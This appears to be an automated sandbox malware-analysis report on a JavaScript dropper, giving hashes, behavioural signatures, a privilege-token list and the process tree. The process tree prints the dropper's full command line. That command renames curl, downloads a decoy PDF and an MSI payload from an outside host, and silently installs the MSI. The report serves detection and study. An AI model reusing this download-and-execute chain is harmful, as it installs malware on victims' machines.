Analysis
-
max time kernel
134s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
06/06/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
N-WITHERSPOON-86707.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
N-WITHERSPOON-86707.js
Resource
win10v2004-20240508-en
General
-
Target
N-WITHERSPOON-86707.js
-
Size
1KB
-
MD5
97df66f95eced4fb840fd9d706d2763d
-
SHA1
608f9e2389f4eaab66f584bd51f93ff3c3ed8a04
-
SHA256
138265fa05533c8d6c8b9bb8686e00926bf5fa6f4b0d5b9a5ade065c5180a9db
-
SHA512
2fbf85c74d3945330138d46518e34725800775644147f105deb4cbf0fdb06a4568f69fa1995d5967d95f2587b13a4b91e23524aab253a2adb58487296d156e57
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 2 IoCs
pid Process 4480 TNheBOJElq.exe 4656 TNheBOJElq.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeShutdownPrivilege 2316 msiexec.exe Token: SeIncreaseQuotaPrivilege 2316 msiexec.exe Token: SeSecurityPrivilege 3896 msiexec.exe Token: SeCreateTokenPrivilege 2316 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2316 msiexec.exe Token: SeLockMemoryPrivilege 2316 msiexec.exe Token: SeIncreaseQuotaPrivilege 2316 msiexec.exe Token: SeMachineAccountPrivilege 2316 msiexec.exe Token: SeTcbPrivilege 2316 msiexec.exe Token: SeSecurityPrivilege 2316 msiexec.exe Token: SeTakeOwnershipPrivilege 2316 msiexec.exe Token: SeLoadDriverPrivilege 2316 msiexec.exe Token: SeSystemProfilePrivilege 2316 msiexec.exe Token: SeSystemtimePrivilege 2316 msiexec.exe Token: SeProfSingleProcessPrivilege 2316 msiexec.exe Token: SeIncBasePriorityPrivilege 2316 msiexec.exe Token: SeCreatePagefilePrivilege 2316 msiexec.exe Token: SeCreatePermanentPrivilege 2316 msiexec.exe Token: SeBackupPrivilege 2316 msiexec.exe Token: SeRestorePrivilege 2316 msiexec.exe Token: SeShutdownPrivilege 2316 msiexec.exe Token: SeDebugPrivilege 2316 msiexec.exe Token: SeAuditPrivilege 2316 msiexec.exe Token: SeSystemEnvironmentPrivilege 2316 msiexec.exe Token: SeChangeNotifyPrivilege 2316 msiexec.exe Token: SeRemoteShutdownPrivilege 2316 msiexec.exe Token: SeUndockPrivilege 2316 msiexec.exe Token: SeSyncAgentPrivilege 2316 msiexec.exe Token: SeEnableDelegationPrivilege 2316 msiexec.exe Token: SeManageVolumePrivilege 2316 msiexec.exe Token: SeImpersonatePrivilege 2316 msiexec.exe Token: SeCreateGlobalPrivilege 2316 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4236 wrote to memory of 2512 4236 wscript.exe 92 PID 4236 wrote to memory of 2512 4236 wscript.exe 92 PID 2512 wrote to memory of 4480 2512 cmd.exe 94 PID 2512 wrote to memory of 4480 2512 cmd.exe 94 PID 2512 wrote to memory of 4656 2512 cmd.exe 95 PID 2512 wrote to memory of 4656 2512 cmd.exe 95 PID 2512 wrote to memory of 2316 2512 cmd.exe 96 PID 2512 wrote to memory of 2316 2512 cmd.exe 96
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\N-WITHERSPOON-86707.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Admin\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" https://in.corpmail.one/download/pdf & "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://in.corpmail.one/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\TNheBOJElq.exeTNheBOJElq.exe -o "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" https://in.corpmail.one/download/pdf3⤵
- Executes dropped EXE
PID:4480
-
-
C:\Users\Admin\AppData\Local\Temp\TNheBOJElq.exeTNheBOJElq.exe -o bLhLldebqq.msi https://in.corpmail.one/download/agent3⤵
- Executes dropped EXE
PID:4656
-
-
C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4196,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:81⤵PID:1780
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b